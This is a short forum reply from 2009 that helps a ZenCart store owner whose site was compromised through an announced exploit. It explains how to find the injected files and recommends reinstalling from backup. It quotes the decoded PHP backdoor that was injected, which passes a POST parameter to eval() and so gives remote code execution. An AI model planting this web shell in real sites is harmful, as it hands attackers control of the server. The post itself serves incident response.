Thread: Please can someone help
View Single Post
  #8 (permalink)  
Old 03-07-2009, 02:26 PM
ghshopper ghshopper is offline
Junior Member
  
Join Date: Jul 2009
Posts: 2
Thanks: 0
Thanked 0 Times in 0 Posts
Default
Yes, you have been hacked.

ZenCart have announced a security exploit that allows files to be written to, and run on, your server. See
http://www.zen-cart.com/forum/showthread.php?t=130161

The exploit also writes records to the record_company table, and you can see the names of files that have been written in there. One of them is a script to insert a piece of code into other files which will produce the error you are seeing.

You will need to re-install from backup, as probably many of your files will have been altered. However, it is safe to delete the line 1 quoted above (leave <?php in place). It is just base 64 encoded code for

if(\$_GET['testorrr']=='1'){ echo 'i love you'; exit; }
if(isset(\$_POST['love'])){
eval(\$_POST['love']);
exit;
Last edited by ghshopper; 03-07-2009 at 02:33 PM.
Reply With Quote